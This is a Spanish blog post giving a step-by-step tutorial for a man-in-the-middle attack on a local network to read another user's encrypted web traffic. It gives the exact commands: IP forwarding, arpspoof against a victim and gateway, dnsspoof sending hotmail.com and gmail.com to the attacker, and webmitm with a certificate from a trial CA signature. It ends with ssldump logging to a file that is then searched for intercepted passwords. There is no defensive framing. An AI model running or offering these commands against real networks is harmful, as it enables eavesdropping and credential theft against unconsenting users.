iniqua

28ene/100

Interceptando comunicaciones web cifradas (I)

Mostramos a continuación un ejemplo muy sencillo y rápido de como llevar una ataque de spoofing en una LAN. Con él conseguiremos ver todo el tráfico del usuario atacado en tiempo real, a partir de un archivo donde volcaremos esa información y en pantalla. Para llevar a cabo el ataque todos los comandos tienen que ser ejecutados con derechos de administrador.

  1. Nos aseguramos que tenemos instalado el software necesario: openssl y la suite dsniff
  2. Generamos nuestro certificado. No voy a explicar como, hay millones de howto por ahí.
  3. Conseguimos que nos lo firme un CA Válido y confiable. Esto es lo difícil. Necesitamos dinero o:

(a) Que nos lo firme entidades que no nos cobran (http://cert.startcom.org/ , http://www.cacert.org/). El problemas de estos CA es que los navegadores no se suelen fiar mucho de ello.

(b) Podemos hacer que nos los firmen entidades confiables. Esto normalmente cuesta dinero (y mucho), pero muchas de ellas te lo firman, como una versión de prueba podríamos decir, para 30 días. Para nuestros propósitos nos sobra. Un ejemplo de entidades que hacen esto puede ser: http://www.rapidssl.com/ssl-certificate-products/free-ssl/freessl.htm

  1. Antes de seguir tentemos que activar el forwarding:

    echo "1" > /proc/sys/net/ipv4/ip_forward

  2. Hacemos un ataque arp spoofing a la víctima a la que queremos ver su tráfico SSL. El parámetro “-t” especifica el usuario al que vas ha atacar y la otra IP la de la puerta de enlace de tu red:

    arpspoof -t IP_VICTIMA IP_PUERTA_DE_ENLACE -i INTERFAZ_DE_RED

  3. Creamos un fichero con los sitios por los que nos queremos hacer pasar:

    Fichero: sitios.txt

    [...]
    MI_IP    hotmail.com
    MI_IP    gmail.com
    [...]

  4. Spoofeamos la respuestas del DNS, imponiendo los valores que definimos en el fichero “sitios.txt”:

    dnsspoof -f sitios.txt -i INTERFAZ_DE_RED

  5. Hacemos el MITM, usando el certificado SSL que nos generamos y que la entidad firmó como confiable. Para que webmitm lo use tenemos que copiarlo al directorio donde vayamos a lanzar webmitm y llamarlo: “webmitm.crt”.

    webmitm -d

  6. Por último recogemos la información que nos proporciona webmitm y lo guardamos en un archivo que podamos consultar. Para que nos muestra en pantalla los resultados y se recojan a la vez en un archivo usaremos la instrucción de Linux tee. El comando completo es el que sigue:

    ssldump -n -d -k webmitm.crt -i INTERFAZ_DE_RED | tee archivo_salida.txt

  7. Finalmente podemos consultar el archivo “archivo_salida.txt” en busca de contraseña interceptadas.
Publicado bajo licencia Creative Commons Attribution-Noncommercial-No Derivative Works 3.0 Spain License.
Create PDF    Enviar articulo en formato PDF a
Etiquetado con: , , , Deja un comentario
Comentarios (0) Trackbacks (0)

Aún no hay comentarios.


Deja un comentario


Aún no hay trackbacks.

» «

idioma

the cloud

backtrack crack cuda DoS exploit firefox firewall google hacking HTTP Internet Libre linux Low Cost MAC Malware mobile news nvidia owasp panda pcapr penetration perl phishing plugin proxy python scapy search Seguridad Software spotify Sun testing tool Tools trojan Tweets Twitter watchbot web win7 wordpress xss

Categorías

link's

Recent Posts

Get Adobe Flash playerPlugin by wpburn.com wordpress themes